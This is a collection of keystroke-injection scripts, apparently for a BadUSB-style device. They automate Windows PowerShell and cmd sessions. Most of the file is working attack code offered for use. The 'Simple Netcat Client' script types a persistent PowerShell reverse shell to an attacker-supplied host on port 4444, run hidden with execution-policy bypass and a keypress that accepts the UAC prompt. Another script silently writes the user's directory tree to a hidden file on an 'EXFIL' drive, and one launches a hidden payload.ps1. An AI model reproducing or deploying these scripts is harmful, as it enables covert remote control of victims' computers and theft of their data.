| } 31 | assurePS32(); // open a 32bit console, if the current one is 64bit 32 | delay(2000); 33 | type("cmd /C start /MIN $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec Bypass .((gwmi win32_volume -f 'label=''RECOVERY''').Name+'\\payload.ps1')") 34 | delay(1000); 35 | press("ENTER") -------------------------------------------------------------------------------- /Set-US-Keyboard.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Set System Language to US 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Set System Language and keyboard to US. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | press("GUI r"); 19 | delay(1500); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2500); 24 | press("ALT y"); 25 | press("left"); 26 | delay(4000); 27 | press("ENTER"); 28 | type("Dism /online /Get-Intl"); 29 | press("ENTER") 30 | delay(4000); 31 | type("Set-WinSystemLocale en-US"); 32 | press("ENTER") 33 | delay(500); 34 | type("Set-WinUserLanguageList en-US -Force"); 35 | press("ENTER") 36 | delay(1500); 37 | type('exit'); 38 | press("ENTER"); 39 | delay(3500); -------------------------------------------------------------------------------- /Simple Netcat Client.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Simple NetCat Client 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRERD] 10 | 11 | // *REQUIREMENTS* 12 | // you will need a Microsoft Outlook Email address for this to work 13 | 14 | // *SETUP* 15 | // replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) 16 | // set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. 17 | 18 | // ============================================================================= 19 | 20 | // script setup 21 | layout("us") 22 | 23 | // Open Powershell as Admin 24 | press("GUI r"); 25 | delay(1000); 26 | type("powershell -NoP -NonI -W Hidden -Exec Bypass"); 27 | delay(500); 28 | press("CONTROL SHIFT ENTER"); 29 | delay(3000); 30 | press("ALT y"); 31 | delay(4000); 32 | 33 | // Main Powershell code 34 | type("do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt(\"YOUR_IP_OR_DOMAIN_HERE\",4444)"); 35 | press("ENTER"); 36 | delay(500); 37 | type(";$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)"); 38 | press("ENTER"); 39 | delay(500); 40 | type(";$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5)"); 41 | press("ENTER"); 42 | delay(500); 43 | -------------------------------------------------------------------------------- /Tree-of-Knowledge.js: -------------------------------------------------------------------------------- 1 | layout('us'); 2 | delay(500); 3 | press("GUI r"); 4 | delay(1500); 5 | type("cmd /k \"mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr \"EXFIL\"') do set myd=%d&echo tree /a /f > echotree.cmd\""); 6 | delay(200) 7 | press("ENTER"); 8 | delay(2500); 9 | type("echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit") 10 | delay(100); 11 | press("ENTER"); 12 | press("ALT SPACE"); 13 | type("n") -------------------------------------------------------------------------------- /Windows-93_slow.js: -------------------------------------------------------------------------------- 1 | 2 | // ============================================================================= 3 | // Title: Start Windows93 4 | // Author: @beigeworm | https://github.com/beigeworm 5 | // Description: Start Windows93 through a browser and fullscreen. 6 | // Target: Windows 10 7 | // ============================================================================= 8 | 9 | // *USB SETTING* 10 | // startup 11 | 12 | // ============================================================================= 13 | 14 | // Script Setup 15 | layout('us'); 16 | // typingSpeed(1,1); 17 | 18 | // Main Payload 19 | delay(500); 20 | press("GUI r"); 21 | delay(1500); 22 | type("cmd"); 23 | delay(200) 24 | press("CTRL SHIFT ENTER"); 25 | delay(2000); 26 | press("ALT y"); 27 | delay(2500); 28 | type("taskkill /F /IM msedge.exe /T > nul") 29 | delay(100); 30 | press("ENTER"); 31 | delay(500); 32 | type("exit") 33 | delay(100); 34 | press("ENTER"); 35 | delay(2000); 36 | press("GUI r"); 37 | delay(1500); 38 | type("msedge.exe --new-window -kiosk www.windows93.net"); 39 | delay(200) 40 | press("ENTER"); 41 | delay(1500); 42 | press("F11"); --------------------------------------------------------------------------------